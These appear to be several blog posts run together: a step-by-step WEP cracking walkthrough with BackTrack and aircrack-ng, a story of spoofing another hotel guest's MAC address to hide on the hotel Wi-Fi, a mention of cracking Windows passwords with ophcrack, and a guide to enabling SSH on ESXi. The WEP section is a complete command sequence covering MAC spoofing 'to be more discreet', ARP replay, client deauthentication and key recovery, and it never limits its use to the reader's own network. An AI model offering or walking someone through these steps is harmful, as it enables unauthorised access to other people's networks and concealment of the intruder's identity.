The first thing we are going to do is install BackTrack 3 or 4 onto an SD card or flash drive or cd/dvd rom so we can boot from it without having to mess up the currently installed OS. I am not going to go into the details of how to do that here, as it is readily available all over the internet.

After you have booted into BackTrack, we are ready for the fun part. The first thing we will do is shutdown our wifi card. In the terminal:

ifconfig wlan0 (yours may be different i.e. ath0 or rausb0) down

Next we want to change the MAC address of your wireless card to make things easier later and help you be more discreet:

macchanger --mac 00:11:22:33:44:55 wlan0

Next we want to bring it back up, but in monitor mode (this enables the card to capture packets without associating with the AccessPoint) :

airmon-ng start wlan0

You should see that a new interface called mon0 was created. That is the interface we are going to use for the rest of our cracking. Next:

airodump-ng mon0

This will list all of the wifi signals your card is picking up. There are two things you are going to want to write down: the BSSID and the Channel (CH), and also make sure the Encryption (ENC) is WEP. Or, if you don’t want to write them down, just open a new shell and leave that one open.

Now press

ctrl+c

to stop airodump-ng.

Open a new console (if you haven’t already) and type:

airodump-ng --channel x --bssid y -w filename mon0

Where x and y are the channel and bssid that you wrote down, and filename is whatever you want the prefix of the output files to be. I usually set the filename to something along the lines of the router name, that way when I’m searching through my cracked WEP files I know whats what.

Now leave that running and open another shell and type:

aireplay-ng --arpreplay -b [Access Point's MAC] -h 00:11:22:33:44:55 mon0

Now leave that running and open yet another shell, and type:

aireplay-ng --deauth 5 -c 00:11:22:33:44:55 -a [Access Point's MAC] mon0

Now in that same window type:

aircrack-ng filename*.cap

Where filename is whatever you entered earlier. And there you go! You should now have the WEP key. Leave feedback in the comments. I would love to answer your questions if any arise.

Well here we go again being curious..... Here is the scenario, I am in a hotel room that has free Wifi (wireless for all those that are not in the know) on a laptop that's running Windows XP (no Linux required for this one) and decide that nothing good can come from this. So I decide well I don't want to give out my MAC address but I'll use somebody elses. Why not? I scan the network using Zenmap because I'm using Windows XP; I'm going with the GUI. After getting a MAC address that I like oh 11:22:33:44:55 sounds good, I then change my MAC address using the MAC address changer (located online for free). Once that is ready I connect to the Internet, accept the agreement from the hotel room, and then receive an IP from the hotel. I'm in!

Here is the scenario, Joe the Admin just dropped a server from the domain to change the name for example and after the restart he tries to login only to find out he can't login. HMMMMM. Another scenario, grandma just bought a new laptop/PC and for whatever reason (AGE) can't remember her password and changing it. There are two ways of getting around this situation; one is using ophcrack w/ rainbow tables and try to crack the password which unless you have a great rainbow table and a strong processor on the PC might take quite a bit to crack.

I ran into this issue last night as I was trying to transfer over files with WinSCP. First off, if you are familiar with ESXi, you know there is no service console by default and you are given the bare bones version of ESX unless you purchase the upgrade for ESXi. If you are using this for home use then ESXi (free) is more than enough. Personally I run ESXi 3.5 Update 4 (free) and for firewall issues I just have a VM running pfSense with no problems. If you ever want to transfer over files or VMDKs to a VMFS lun/disk you need to enable SSH to use WinSCP.

Here is how its done:
1. At the start up screen (Management Console) press ALT+F1 and a console screen will come up
2. Type unsupported (you will not see the text) and press Enter
3. You'll see "Technical Support Mode" and a prompt for a password; simply type in your root password
4. If everything is successful you will be given a shell "#"
5. Type in vi /etc/inetd.conf
6. The config file will come up on the screen and now just scroll down until you see "#SSH"
7. Press the "Insert" button on your keyboard and remove the # (This will uncomment the function)
8. Now press "ESC" button and type :wq (this will write and quit your editing session)
9. Now type in ps -a | grep inetd (this will find the process for inetd)
10. You should see the PID for "busybox"/"inetd" (the number will be different for everyone)
11. Type kill (and the PID number from the last step) and this will stop the inetd process
12. Type cd /etc
13. Type ./services.sh restart (this will restart the management services)
14. Now perform a clean reboot of your ESXi machine by typing ALT+F2 to get back to the management screen
15. Press F12 to shutdown/restart and restart (wait for you machine to come back up)
16. Now you should be able to log in with SSH (putty) and SCP (WinSCP)